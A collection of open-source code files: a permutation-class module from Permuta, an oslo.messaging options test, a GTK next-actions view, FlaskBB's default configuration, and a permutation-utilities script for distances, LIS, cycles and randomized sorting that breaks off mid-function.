PermutaTriangle/Permuta | permuta/perm_sets/permset.py | 1 | 7411 | import multiprocessing
from itertools import islice
from typing import ClassVar, Dict, Iterable, List, NamedTuple, Optional, Union
from ..patterns import MeshPatt, Perm
from ..permutils import is_finite, is_insertion_encodable, is_polynomial
from .basis import Basis, MeshBasis
class AvBase(NamedTuple):
"""A base class for Av to define instance variables without having to use
__init__ in Av.
"""
basis: Union[Basis, MeshBasis]
cache: List[Dict[Perm, Optional[List[int]]]]
class Av(AvBase):
"""A permutation class defined by its minimal basis."""
_FORBIDDEN_BASIS = Basis(Perm())
_VALUE_ERROR_MSG = "Basis should be non-empty without the empty perm!"
_BASIS_ONLY_MSG = "Only supported for Basis!"
_CLASS_CACHE: ClassVar[Dict[Union[Basis, MeshBasis], "Av"]] = {}
_CACHE_LOCK = multiprocessing.Lock()
def __new__(
cls,
basis: Union[
Basis,
MeshBasis,
Iterable[Perm],
Iterable[Union[Perm, MeshPatt]],
],
) -> "Av":
if not isinstance(basis, (Basis, MeshBasis)):
return Av.from_iterable(basis)
if len(basis) == 0 or basis == Av._FORBIDDEN_BASIS:
raise ValueError(Av._VALUE_ERROR_MSG)
instance = Av._CLASS_CACHE.get(basis)
if instance is None:
new_instance: "Av" = AvBase.__new__(cls, basis, [{Perm(): [0]}])
Av._CLASS_CACHE[basis] = new_instance
return new_instance
return instance
@classmethod
def clear_cache(cls) -> None:
"""Clear the instance cache."""
cls._CLASS_CACHE = {}
@classmethod
def from_string(cls, basis) -> "Av":
"""Create a permutation class from a string. Basis can be either zero or one
based and seperated by anything. MeshBasis is not supported.
"""
return cls(Basis.from_string(basis))
@classmethod
def from_iterable(
cls, basis: Union[Iterable[Perm], Iterable[Union[Perm, MeshPatt]]]
) -> "Av":
"""
Create a permutation class from a basis defined by an iterable of patterns.
"""
if MeshBasis.is_mesh_basis(basis):
return cls(MeshBasis(*basis))
return cls(Basis(*basis))
def is_finite(self) -> bool:
"""Check if the perm class is finite."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_finite(self.basis)
def is_polynomial(self) -> bool:
"""Check if the perm class has polynomial growth."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_polynomial(self.basis)
def is_insertion_encodable(self) -> bool:
"""Check if the perm class is insertion encodable."""
if isinstance(self.basis, MeshBasis):
raise NotImplementedError(Av._BASIS_ONLY_MSG)
return is_insertion_encodable(self.basis)
def first(self, count: int) -> Iterable[Perm]:
"""Generate the first `count` permutation in this permutation class given
that it has that many, if not all are generated.
"""
yield from islice(self._all(), count)
def of_length(self, length: int) -> Iterable[Perm]:
"""
Generate all perms of a given length that belong to this permutation class.
"""
return iter(self._get_level(length))
def up_to_length(self, length: int) -> Iterable[Perm]:
"""Generate all perms up to and including a given length that
belong to this permutation class.
"""
for n in range(length + 1):
yield from self.of_length(n)
def count(self, length: int) -> int:
"""Return the nubmber of permutations of a given length."""
return len(self._get_level(length))
def enumeration(self, length: int) -> List[int]:
"""Return the enumeration of this permutation class up and including a given
length."""
return [self.count(i) for i in range(length + 1)]
def __contains__(self, other: object):
if isinstance(other, Perm):
return other in self._get_level(len(other))
return False
def is_subclass(self, other: "Av"):
"""Check if a sublcass of another permutation class."""
return all(p1 not in self for p1 in other.basis)
def _ensure_level(self, level_number: int) -> None:
start = max(0, len(self.cache) - 2)
if isinstance(self.basis, Basis):
self._ensure_level_classical_pattern_basis(level_number)
else:
self._ensure_level_mesh_pattern_basis(level_number)
for i in range(start, level_number - 1):
self.cache[i] = {perm: None for perm in self.cache[i]}
def _ensure_level_classical_pattern_basis(self, level_number: int) -> None:
# We build new elements from existing ones
lengths = {len(b) for b in self.basis}
max_size = max(lengths)
for nplusone in range(len(self.cache), level_number + 1):
n = nplusone - 1
new_level: Dict[Perm, Optional[List[int]]] = dict()
last_level = self.cache[-1]
check_length = nplusone in lengths
smaller_elems = {b for b in self.basis if len(b) == nplusone}
def valid_insertions(perm):
# pylint: disable=cell-var-from-loop
res = None
for i in range(max(0, n - max_size), n):
val = perm[i]
subperm = perm.remove(i)
spots = self.cache[n - 1][subperm]
acceptable = [k for k in spots if k <= val]
acceptable.extend(k + 1 for k in spots if k >= val)
if res is None:
res = frozenset(acceptable)
res = res.intersection(acceptable)
if not res:
break
return res if res is not None else range(nplusone)
for perm, lis in last_level.items():
for value in valid_insertions(perm):
new_perm = perm.insert(index=nplusone, new_element=value)
if not check_length or new_perm not in smaller_elems:
new_level[new_perm] = []
assert lis is not None
lis.append(value)
self.cache.append(new_level)
def _ensure_level_mesh_pattern_basis(self, level_number: int) -> None:
self.cache.extend(
{p: None for p in Perm.of_length(i) if p.avoids(*self.basis)}
for i in range(len(self.cache), level_number + 1)
)
def _get_level(self, level_number: int) -> Dict[Perm, Optional[List[int]]]:
with Av._CACHE_LOCK:
self._ensure_level(level_number)
return self.cache[level_number]
def _all(self) -> Iterable[Perm]:
length = 0
while True:
gen = (p for p in self.of_length(length))
first: Optional[Perm] = next(gen, None)
if first is None:
break
yield first
yield from gen
length += 1
def __str__(self) -> str:
return f"Av({','.join(str(p) for p in self.basis)})"
def __repr__(self) -> str:
return f"Av({repr(self.basis)})"
| bsd-3-clause | 2,888,055,935,576,423,400 | 36.619289 | 84 | 0.575361 | false |
redhat-openstack/oslo.messaging | tests/test_opts.py | 1 | 1718 |
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import pkg_resources
import testtools
try:
from oslo.messaging import opts
except ImportError:
opts = None
from tests import utils as test_utils
class OptsTestCase(test_utils.BaseTestCase):
@testtools.skipIf(opts is None, "Options not importable")
def setUp(self):
super(OptsTestCase, self).setUp()
def _test_list_opts(self, result):
self.assertEqual(3, len(result))
groups = [g for (g, l) in result]
self.assertIn(None, groups)
self.assertIn('matchmaker_ring', groups)
self.assertIn('matchmaker_redis', groups)
opt_names = [o.name for (g, l) in result for o in l]
self.assertIn('rpc_backend', opt_names)
def test_list_opts(self):
self._test_list_opts(opts.list_opts())
def test_entry_point(self):
result = None
for ep in pkg_resources.iter_entry_points('oslo.config.opts'):
if ep.name == "oslo.messaging":
list_fn = ep.load()
result = list_fn()
break
self.assertIsNotNone(result)
self._test_list_opts(result)
| apache-2.0 | -1,196,736,249,446,566,700 | 30.814815 | 78 | 0.652503 | false |
jensck/fluidity | fluidity/incubator/next_actions_view.py | 1 | 4059 | import gtk
import pango
class NextActionsView(gtk.VBox):
"""Simple class for display of Next Actions"""
def __init__(self):
super(NextActionsView, self).__init__()
self._liststore = gtk.ListStore(bool, str, int, str)
self._treeview = gtk.TreeView()
self._treeview.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
self._treeview.set_model(self._liststore)
self._actions = []
# Although this module requires a gtk.ListStore with a fixed format
# (bool, str, int, str), the code for supplying that ListStore
# is in the NextActionsModel module.
# we're assuming that a checkbox in a list of tasks, along with the
# strikethrough text for completed actions, will be enough to let the
# user know what the column is, instead of trying to fit the longer label
done_renderer = gtk.CellRendererToggle()
done_renderer.set_property("activatable", True)
done_renderer.connect("toggled", self.on_done_toggled)
done_column = gtk.TreeViewColumn(None, done_renderer, active=0)
summary_cell = gtk.CellRendererText()
summary_column = gtk.TreeViewColumn(None, summary_cell, text=1)
summary_column.set_cell_data_func(summary_cell, _format_func, data=None)
context_cell = gtk.CellRendererText()
context_column = gtk.TreeViewColumn(None, context_cell, text=3)
context_column.props.sizing = gtk.TREE_VIEW_COLUMN_AUTOSIZE
for col in done_column, context_column, summary_column:
self._treeview.append_column(col)
self._treeview.props.headers_visible = False
self._treeview.props.rules_hint = True
self.pack_start(self._treeview, True, True, 0)
def get_selected_model_objects(self):
"""Return the selected *objects*, ala Kiwi's ObjectList."""
model, selected_rows = self._treeview.get_selection().get_selected_rows()
# have to do this goofy i[0] because .get_selected_rows() returns
# *tuples* (representing "paths" in GTK-speak) with the first member
# as the index of the row
return [self._actions[i[0]] for i in selected_rows]
def set_actions(self, actions):
self.clear()
self._actions.extend(actions)
for action in actions:
self._liststore.append(_convert_na_to_iterable(action))
def clear(self):
self._actions = [] # Gross. Why don't Python lists have a .clear()?
self._liststore.clear()
def on_done_toggled(self, cell_renderer, path, data = None):
action = self._actions[int(path[0])]
action.complete = not action.complete
# self._liststore.row_changed(path, self._liststore.get_iter(path))
# cell_renderer.set_active(action.complete)
self._liststore[path][0] = action.complete
def _convert_na_to_iterable(na):
item = list()
item.append(na.complete)
item.append(na.summary)
item.append(na.priority)
item.append(na.context)
return item
def _format_func(column, cell, model, my_iter):
"""Format gtk.TreeView cell according to priority and completion status
of a gee_tee_dee.NextAction.
"""
# Using this font makes the UltraHeavy, Normal, and UltraLight text
# weights clearly distinguishable from one another.
# cell.set_property("font", "Sans 12")
if (model.get_value(my_iter, 0) == True):
# First check completion status of task (column 0 of the model)
# and set "strikethrough" for display of completed tasks.
cell.set_property("strikethrough", True)
else:
cell.set_property("strikethrough", False)
if model.get_value(my_iter, 2) == 1:
# Now check priority of task and set text weight accordingly.
cell.set_property("weight", pango.WEIGHT_HEAVY)
elif model.get_value(my_iter, 2) == 3:
cell.set_property("weight", pango.WEIGHT_ULTRALIGHT)
else:
cell.set_property("weight", pango.WEIGHT_NORMAL)
| gpl-3.0 | -4,824,018,486,579,330,000 | 40.845361 | 81 | 0.647204 | false |
joyhuang-web/flaskbb | flaskbb/configs/default.py | 1 | 2497 | # -*- coding: utf-8 -*-
"""
flaskbb.configs.default
~~~~~~~~~~~~~~~~~~~~~~~
This is the default configuration for FlaskBB that every site should have.
You can override these configuration variables in another class.
:copyright: (c) 2014 by the FlaskBB Team.
:license: BSD, see LICENSE for more details.
"""
import os
class DefaultConfig(object):
# Get the app root path
# <_basedir>
# ../../ --> flaskbb/flaskbb/configs/base.py
_basedir = os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(
os.path.dirname(__file__)))))
DEBUG = False
TESTING = False
# Logs
# If SEND_LOGS is set to True, the admins (see the mail configuration) will
# recieve the error logs per email.
SEND_LOGS = False
# The filename for the info and error logs. The logfiles are stored at
# flaskbb/logs
INFO_LOG = "info.log"
ERROR_LOG = "error.log"
# Default Database
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + _basedir + '/' + \
'flaskbb.sqlite'
# This will print all SQL statements
SQLALCHEMY_ECHO = False
# Security
# This is the secret key that is used for session signing.
# You can generate a secure key with os.urandom(24)
SECRET_KEY = 'secret key'
# Protection against form post fraud
WTF_CSRF_ENABLED = True
WTF_CSRF_SECRET_KEY = "reallyhardtoguess"
# Searching
WHOOSH_BASE = os.path.join(_basedir, "whoosh_index")
# Auth
LOGIN_VIEW = "auth.login"
REAUTH_VIEW = "auth.reauth"
LOGIN_MESSAGE_CATEGORY = "error"
# Caching
CACHE_TYPE = "simple"
CACHE_DEFAULT_TIMEOUT = 60
## Captcha
RECAPTCHA_ENABLED = False
RECAPTCHA_USE_SSL = False
RECAPTCHA_PUBLIC_KEY = "your_public_recaptcha_key"
RECAPTCHA_PRIVATE_KEY = "your_private_recaptcha_key"
RECAPTCHA_OPTIONS = {"theme": "white"}
## Mail
MAIL_SERVER = "localhost"
MAIL_PORT = 25
MAIL_USE_SSL = False
MAIL_USE_TLS = False
MAIL_USERNAME = "[email protected]"
MAIL_PASSWORD = ""
MAIL_DEFAULT_SENDER = ("Default Sender", "[email protected]")
# Where to logger should send the emails to
ADMINS = ["[email protected]"]
## Flask-And-Redis
REDIS_ENABLED = False
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_DB = 0
FORUM_URL_PREFIX = ""
USER_URL_PREFIX = "/user"
AUTH_URL_PREFIX = "/auth"
ADMIN_URL_PREFIX = "/admin"
| bsd-3-clause | -3,027,264,106,101,590,500 | 26.43956 | 79 | 0.617942 | false |
goldengod/dep | plib.py | 1 | 20556 | #some import
import numpy
import itertools
import random
import math
import os.path
import urllib2
import sys
#global variables
n = None
N = None
Dk = None
Du = None
Dc = None
e = None
r = None
x = None
xa = None
ASW = None
EXC = None
INS = None
pASW = None
pEXC = None
pINS = None
#help function
def help():
print("""
VARIABLES
---------
n permutation size
N total number of permutations
Dk diameter with Kendall's tau distance
Du diameter with Ulam distance
Dc diameter with Cayley distance
e identity permutation
r identity reversed permutation
x a random permutation
xa antipodal permutation of x with respect to exchanges
ASW set of adjacent swap generators (in tuple normal form)
EXC set of exchange generators (in tuple normal form)
INS set of insertion generators (in tuple normal form)
pASW ASW in permutation form
pEXC EXC in permutation form
pINS INS in permutation form
FUNCTIONS
---------
reset(n) re-initialize environment with a new permutation size
fact(n) factorial of n
inv(x) inverse of x
rev(x) reverse of x
compl(x) complement of x
dot(x,y) composition x*y
prand() a random permutation
isPerm(x) check if the list x is a permutation
asw(i) adjacent swap (i,i+1) [callable also with a tuple arg]
exc(i,j) exchange (i,j) [callable also with a tuple arg]
ins(i,j) insertion (i,j) [callable also with a tuple arg]
asw_nf(i) tuple normal form for adjacent swap (i,j) with j=i+1
exc_nf(t) tuple normal form for exchange (t[0],t[1]) with t[1]>t[0]
ins_nf(t) tuple normal form for insertion (t[0],t[1]) with t[1]>t[0] only for case t[1]=t[0]+1
aswToTuple(x) convert an adjacent swap from permutation form to tuple form
excToTuple(x) convert an exchange from permutation form to tuple form
insToTuple(x) convert an insertion from permutation form to tuple form
swap(x,i,j) swap items at position i and j in x (inplace)
insert(x,i,j) shift item at position i to position j in x (inplace)
dk(x,y) Kendall's tau distance between x and y
du(x,y) Ulam distance between x and y
dc(x,y) Cayley distance between x and y
ninver(x) number of inversion in x
inver(x) set of inversions in x
ainver(x) list of adjacent inversions in x
lis(x) standard lis of x
llis(x) length of a lis of x
alis(x) all the lis of x
urlis(x) unfirom random lis of x
ind(l,x) indexes of x where values in list l appear
cycles(x) cycle decomposition of x
ncycles(x) number of cycles of the decomposition of x
cycleToPerm(c) build a permutation corresponding to cycle c
prandUnredLis() random permutation whose lis is "unreducible"
hasUnredLis(x) check if the lis of x can be reduced or not
lisldsRedCases(x) print and return lis/lds reduction cases after applying all insertion generators (if additional False is passed it doesnt print)
printLisLdsRedCases(d)print the result of "lisldsRedCases"
bothLisLdsIncrease() get a random permutation x + ins generator g such that x*g increases both lis and lds lengths
prand1c() random permutation whith only one cycle
stirling1u(n,k) [n,k] unsigned stirling number of the 1st kind
npermWithCycles(k) number of permutations with k cycles
lds(x) standard lds of x
llds(x) length of a lds of x
alds(x) all the lds of x
urlds(x) uniform random lds of x
mahonian(n,k) [n,k] mahonian number
npermWithInvers(k) number of permutations with k inversions
seqA047874(n,k) [n,k] number of the sequence A047874 (it works only till n=60 and requires the file at https://oeis.org/A047874/b047874.txt or internet)
npermWithLisLength(k) number of permutations with a lis of length k (it works only tille n=60 the file at https://oeis.org/A047874/b047874.txt or internet)
applySeq(x,s) return x*s[0]*s[1]*...
composeSeq(s) return s[0]*s[1]*...
mapAswSeq(s) from a sequence of ASW tuples return a sequence of permutations
mapExcSeq(s) from a sequence of EXC tuples return a sequence of permutations
mapInsSeq(s) from a sequence of INS tuples return a sequence of permutations
randbs(x) return a sequence of ASW tuples that sorts x
randDecAsw(x) return a ASW decomposition of x
randss(x) return a sequence of EXC tuples that sorts x
randmergess(x) return a sequence of EXC tuples that UNsorts x
randDecExc(x) return a EXC decomposition of x
randis(x,randlis) return a sequence of INS tuples that sorts x (UNIFORM STEP NOT IMPLEMENTED) (the randlis function as parameter is optional)
randDecIns(x,randlis) return a INS decomposition of x (see randis)
checkAllInsDiamRev() return true if for all permutations x the Ulam distance between x and rev(x) equals the Ulam diameter
ssort(x) return the sequence of EXC using classical selection sort
expInertia(nexp,q) write how many inertia anomalies with q adj.swaps are over nexp random experiments
all_asw_decomp(x) return all the decompositions (using ASW) of x
checkAverage(x,y) check if the a*x+(1-a)*y has equiprobability
perm2str(x) return string representation of the permutation x
""")
#test function
#def test():
# pass
#default permutation size
DEFAULT_n = 10
#reset/init functions (with global variables declaration)
def reset(size=DEFAULT_n):
#global variables
global n,N,Dk,Du,Dc,e,r,ASW,EXC,INS,pASW,pEXC,pINS
#permutation size
n = size
#total number of permutations
N = fact(n)
#diameters
Dk = n*(n-1)/2
Du = n-1
Dc = n-1
#useful permutations
e = range(n)
r = e[::-1]
x = prand()
xa = applySeq(x,mapExcSeq(randmergess(x)))
#generators sets
ASW = set()
for i in range(n-1):
ASW.add((i,i+1))
pASW = sorted(map(lambda p : asw(p), ASW))
EXC = set()
for i in range(n):
for j in range(i+1,n):
EXC.add((i,j))
pEXC = sorted(map(lambda p : exc(p), EXC))
INS = set()
for i in range(n):
for j in filter(lambda j : j!=i and j!=i-1,range(n)):
INS.add((i,j))
pINS = sorted(map(lambda p : ins(p), INS))
#copy variables to the main module scope
import __main__
__main__.n = n
__main__.N = N
__main__.Dk = Dk
__main__.Du = Du
__main__.Dc = Dc
__main__.e = e
__main__.r = r
__main__.x = x
__main__.xa = xa
__main__.ASW = ASW
__main__.pASW = pASW
__main__.EXC = EXC
__main__.pEXC = pEXC
__main__.INS = INS
__main__.pINS = pINS
init = reset
#some basic functions
def fact(n):
return math.factorial(n)
def inv(x):
z = [None]*n
for i in range(n):
z[x[i]] = i
return z
def rev(x):
return x[::-1]
def dot(x,y):
return [x[v] for v in y]
def prand():
return numpy.random.permutation(n).tolist()
def isPerm(x):
return sorted(x)==e
def compl(x):
return [n-1-v for v in x]
#generators to permutation functions
def asw(g1,g2=-1):
if type(g1) is tuple:
return exc(g1[0],g1[0]+1)
else:
return exc(g1,g1+1)
def exc(g1,g2=-1):
if type(g1) is tuple:
i,j = g1
else:
i,j = g1,g2
z = e[:]
z[i],z[j] = z[j],z[i]
return z
def ins(g1,g2=-1):
if type(g1) is tuple:
i,j = g1
else:
i,j = g1,g2
if i<j:
return range(i) + range(i+1,j+1) + [i] + range(j+1,n)
else:
return range(j) + [i] + range(j,i) + range(i+1,n)
def asw_nf(t):
if type(t) is not tuple:
return (t,t+1)
return exc_nf(t)
def exc_nf(t):
return tuple(sorted(t))
def ins_nf(t):
return tuple(sorted(t)) if t[0]==t[1]+1 else t
def aswToTuple(x):
t = excToTuple(x)
if t[1]!=t[0]+1:
print("It is not an adjacent swap!!!")
return (t[0],t[0]+1)
def excToTuple(x):
diff = [i==x[i] for i in range(n)]
if diff.count(False)!=2:
print("It is not an exchange!!!")
return tuple([i for i,v in enumerate(diff) if not v])
def insToTuple(x):
diff = [i==x[i] for i in range(n)]
if diff.count(False)<2:
print("It is not an insertion!!!")
first,last = diff.index(False),n-1-diff[::-1].index(False)
if any(diff[first:last]):
print("It is not an insertion!!!")
if x[first]==first+1: #i<j
if x[first:last-1]!=range(first+1,last):
print("It is not an insertion!!!")
return (first,last)
else: #i>j
if x[first+1:last]!=range(first,last-1) or x[first]!=last:
print("It is not an insertion!!!")
return (last,first)
#swap and insert inplace
def swap(x,i,j=-1):
if j==-1:
j = i+1
x[i],x[j] = x[j],x[i]
def insert(x,i,j):
t = x[i]
del x[i]
x.insert(j,t)
#distances
def dk(x,y):
return ninver(dot(inv(y),x))
def du(x,y):
return n-llis(dot(inv(y),x))
def dc(x,y):
return n-ncycles(dot(inv(y),x))
#inversion function
def ninver(x):
return len(inver(x))
def inver(x):
return set([(i,j) for i,j in itertools.combinations(range(n),2) if x[i]>x[j]])
def ainver(x):
return [(i,i+1) for i in range(n-1) if x[i]>x[i+1]]
#lis functions
def lis(x):
#see http://rosettacode.org/wiki/Longest_increasing_subsequence#Python
X = x[:]
N = len(X)
P = [0 for i in range(N)]
M = [0 for i in range(N+1)]
L = 0
for i in range(N):
lo = 1
hi = L
while lo <= hi:
mid = (lo+hi)//2
if (X[M[mid]] < X[i]):
lo = mid+1
else:
hi = mid-1
newL = lo
P[i] = M[newL-1]
M[newL] = i
if (newL > L):
L = newL
S = []
k = M[L]
for i in range(L-1, -1, -1):
S.append(X[k])
k = P[k]
return S[::-1]
def llis(x):
return len(lis(x))
def alis(x):
#see http://stackoverflow.com/questions/9554266/finding-all-possible-longest-increasing-subsequence?rq=1
count = [1]*n
def longestIncreaseSubsequence(seq):
n = len(seq)
for i in range(1,n):
maxi = 0
for j in range(i-1,-1,-1):
if seq[j]<seq[i]:
maxi = max(maxi,count[j])
count[i] = maxi + 1
maxi = 0
for i in range(len(count)):
if count[i]>maxi:
maxi = count[i]
return maxi
def allLIS(a,k,count,arr,maxi,result):
if k==maxi:
lista = []
for i in range(maxi,0,-1):
lista.append(arr[a[i]])
result.append(lista)
else:
k = k+1
candidates = [None]*len(arr)
ncandidate = 0
for i in range(a[k-1],-1,-1):
if count[i]==maxi-k+1 and (arr[i]<arr[a[k-1]] or count[i]==maxi):
candidates[ncandidate] = i
ncandidate = ncandidate + 1
for i in range(0,ncandidate):
a[k] = candidates[i]
allLIS(a,k,count,arr,maxi,result)
maxi = longestIncreaseSubsequence(x)
a = [None]*(maxi+1)
a[0] = len(x)-1
result = []
allLIS(a,0,count,x,maxi,result)
return result
def urlis(x):
return random.choice(alis(x))
def ind(l,x):
return [x.index(v) for v in l]
#cycles functions
def cycles(perm):
#see https://gist.github.com/begriffs/2211881
remain = set(perm)
result = []
while len(remain) > 0:
n = remain.pop()
cycle = [n]
while True:
n = perm[n]
if n not in remain:
break
remain.remove(n)
cycle.append(n)
result.append(cycle)
return result
def ncycles(x):
return len(cycles(x))
def cycleToPerm(c):
z = range(n)
for k in range(len(c)-1):
i = c[k]
j = c[k+1]
z[i] = j
z[c[-1]] = c[0]
return z
#lis reduction functions
def prandUnredLis():
while True:
x = prand()
lx = llis(x)
flag = True
for pins in pINS:
y = dot(x,pins)
ly = llis(y)
if ly<lx:
flag = False
if flag:
return x
def hasUnredLis(x):
lx = llis(x)
for pins in pINS:
y = dot(x,pins)
if llis(y)<lx:
return False
return True
def lisldsRedCases(x,verbose=True):
r = { "<<":0, "<=":0, "<>":0, "=<":0, "==":0, "=>":0, "><":0, ">=":0, ">>":0, "other":0 }
l1x,l2x = llis(x),llds(x)
for g in pINS:
y = dot(x,g)
l1y,l2y = llis(y),llds(y)
if l1y==l1x-1 and l2y==l2x-1:
r["<<"] += 1
elif l1y==l1x-1 and l2y==l2x:
r["<="] += 1
elif l1y==l1x-1 and l2y==l2x+1:
r["<>"] += 1
elif l1y==l1x and l2y==l2x-1:
r["=<"] += 1
elif l1y==l1x and l2y==l2x:
r["=="] += 1
elif l1y==l1x and l2y==l2x+1:
r["=>"] += 1
elif l1y==l1x+1 and l2y==l2x-1:
r["><"] += 1
elif l1y==l1x+1 and l2y==l2x:
r[">="] += 1
elif l1y==l1x+1 and l2y==l2x+1:
r[">>"] += 1
else:
r["other"] += 1
if verbose:
printLisLdsRedCases(r)
return r
def printLisLdsRedCases(d):
print("ID")
print("<< : "+(str(d["<<"] if "<<" in d else 0)))
print("<= : "+(str(d["<="] if "<=" in d else 0)))
print("<> : "+(str(d["<>"] if "<>" in d else 0)))
print("=< : "+(str(d["=<"] if "=<" in d else 0)))
print("== : "+(str(d["=="] if "==" in d else 0)))
print("=> : "+(str(d["=>"] if "=>" in d else 0)))
print(">< : "+(str(d["><"] if "><" in d else 0)))
print(">= : "+(str(d[">="] if ">=" in d else 0)))
print(">> : "+(str(d[">>"] if ">>" in d else 0)))
print("other : "+(str(d["other"] if "other" in d else 0)))
def bothLisLdsIncrease():
while True:
x = prand()
l1x,l2x = llis(x),llds(x)
for g in pINS:
y = dot(x,g)
l1y,l2y = llis(y),llds(y)
if l1y>l1x and l2y>l2x:
return [x,g]
#random permutation with only 1 cycle
def prand1c():
x = [None]*n
c = range(1,n)
i = 0
while c:
j = random.choice(c)
c.remove(j)
x[i] = j
i = j
x[i] = 0
return x
#cycle distribution functions
def stirling1u(n,k):
#stirling number of the 1st kind unsigned
if n==0 and k==0:
return 1
if n==0 or k==0:
return 0
return (n-1)*stirling1u(n-1,k) + stirling1u(n-1,k-1)
def npermWithCycles(k):
return stirling1u(n,k)
#lds functions
def lds(x):
return compl(lis(compl(x)))
def llds(x):
return len(lds(x))
def alds(x):
return [compl(l) for l in alis(compl(x))]
def urlds(x):
return compl(urlis(compl(x)))
#inversion distribution functions
def mahonian(n,k):
#see http://stackoverflow.com/questions/19372991/number-of-n-element-permutations-with-exactly-k-inversions
def mahonian_row(n):
i = 1
result = [1]
while i < n:
prev = result[:]
result = [0] * int(1 + ((i + 1) * 0.5) * (i))
m = [1] * (i + 1)
for j in range(len(m)):
for k in range(len(prev)):
result[k+j] += m[j] * prev[k]
i = i + 1
return result
return mahonian_row(n)[k]
def npermWithInvers(k):
return mahonian(n,k)
#lis length distribution function
def seqA047874(n,k):
#see https://oeis.org/A047874 and https://oeis.org/A047874/b047874.txt
if n>60:
print("Impossible to compute this value for n greater than 60")
lineno = n*(n-1)/2 + k
fn = "b047874.txt"
if os.path.exists(fn):
with open(fn,"r") as f:
for line in f:
if int(line.split()[0])==lineno:
return int(line.split()[1])
else:
print "Trying to read the file from web https://oeis.org/A047874/b047874.txt"
un = "https://oeis.org/A047874/b047874.txt"
txt = urllib2.urlopen(un).read().split("\n")
for line in txt:
if int(line.split()[0])==lineno:
return int(line.split()[1])
return -1
def npermWithLisLength(k):
return seqA047874(n,k)
#randomized sorting algorithms
def applySeq(x,s):
z = x[:]
for y in s:
z = dot(z,y)
return z
def composeSeq(s):
return applySeq(e,s)
def mapAswSeq(s):
return map(lambda p : asw(p), s)
def mapExcSeq(s):
return map(lambda p : exc(p), s)
def mapInsSeq(s):
return map(lambda p : ins(p), s)
def randbs(x):
y = x[:]
s = []
ai = ainver(y)
while len(ai)>0:
sw = random.choice(ai)
swap(y,sw[0],sw[1])
ai = ainver(y)
s.append(sw)
return s
def randDecAsw(x):
return randbs(inv(x))
def randss(x):
y = x[:]
s = []
cyc = cycles(y)
while len(cyc)<n:
cyc = filter(lambda c : len(c)>1,cyc)
q = list(numpy.cumsum([len(c)*(len(c)-1)/2 for c in cyc]))
tot = q[-1]
r = random.randint(0,tot-1)
for i in range(len(cyc)):
if r<q[i]:
c = i
c = cyc[c]
i = random.choice(c)
c.remove(i)
j = random.choice(c)
s.append(exc_nf((i,j)))
swap(y,i,j)
cyc = cycles(y)
return s
def randmergess(x):
y = x[:]
s = []
cyc = cycles(y)
while len(cyc)>1:
w = list(numpy.cumsum([len(cyc[k])*(n-len(cyc[k])) for k in range(len(cyc))]))
r = random.randint(0,w[-1]-1)
for c1 in range(len(cyc)):
if r<w[c1]:
break
i = random.choice(cyc[c1])
del cyc[c1]
w = list(numpy.cumsum(map(lambda c : len(c),cyc)))
r = random.randint(0,w[-1]-1)
for c2 in range(len(cyc)):
if r<w[c2]:
break
j = random.choice(cyc[c2])
s.append(exc_nf((i,j)))
swap(y,i,j)
cyc = cycles(y)
return s
def randDecExc(x):
return randss(inv(x))
def randis(x,randlis=urlis):
y = x[:]
s = []
lis = randlis(y)
while len(lis)<n:
u = [i for i in range(n) if i not in lis]
i = random.choice(ind(u,y))
ival = y[i]
for b in range(len(lis)):
if lis[b]>ival:
break
else:
b = len(lis)
if b==0:
a,b = 0,y.index(lis[0])
elif b==len(lis):
a,b = y.index(lis[-1]),n-1
else:
a,b = y.index(lis[b-1]),y.index(lis[b])
if a==b:
j = a
elif i<a:
j = random.randint(a,b-1)
elif i>b:
j = random.randint(a+1,b)
else:
j = None
print("Problem with randis")
s.append(ins_nf((i,j)))
lis.append(ival)
lis = sorted(lis)
insert(y,i,j)
if lis not in alis(y):
print("BIG PROBLEM")
return s
def decInsSeq(x,randlis=urlis):
return randis(inv(x),randlis)
def checkAllInsDiamRev():
#return true if for all permutations x the Ulam distance between x and rev(x) equals the Ulam diameter
#return false otherwise
for p in itertools.permutations(e):
x = list(p)
r = rev(x)
if du(x,r)!=Du:
return False
return True
def ssort(x):
y = x[:]
s = []
for j in range(0,n-1):
imin = j
for i in range(j+1,n):
if y[i]<y[imin]:
imin = i
if imin!=j:
t = y[j]
y[j] = y[imin]
y[imin] = t
s.append(exc_nf((j,imin)))
return s
def expInertia(nexp=1000,q=1):
anomalies = 0
for i in xrange(nexp):
x = prand()
dx = randDecAsw(x)
#y = dot(x,asw(dx[0]))
y = [x[k] for k in xrange(n)] #
for j in xrange(q): #
if j>=len(dx): #
break #
y = dot(y,asw(dx[j])) #
wx = ninver(x)
wy = ninver(y)
#if wy!=wx+1:
if wy!=wx+q: #
anomalies += 1
print "Anomalies: " + str(anomalies) + " / " + str(nexp)
def all_asw_decomp_aux(a,L,sc,ld):
n=len(a)
if L==[]:
ld.append(sc)
else:
for i in L:
L1=[j for j in L if j!=i]
sc1=[i]+sc
swap(a,i,i+1) #scambia(a,i,i+1)
if i<n-2 and i+1 not in L1 and a[i+1]>a[i+2]:
L1.append(i+1)
if i>0 and i-1 not in L1 and a[i-1]>a[i]:
L1.append(i-1)
all_asw_decomp_aux(a,L1,sc1,ld)
swap(a,i,i+1) #scambia(a,i,i+1)
def all_asw_decomp(a):
ld=[]
n=len(a)
L=[i for i in range(n-1) if a[i]>a[i+1]]
all_asw_decomp_aux(a,L,[],ld)
return ld
def perm2str(x):
s = ""
for i in range(len(x)):
s += str(x[i])
if i<len(x)-1:
s += ","
return s
def checkAverage(q):
for j in range(q):
x = prand()
y = prand()
if dk(x,y)<=1:
continue
#x+a*(y-x) and y+(1-a)*(x-y)
#z=y-x=x^-1*y and w=x-y=y^-1*x=inv(y-x)
z = dot(inv(x),y)
w = inv(z)
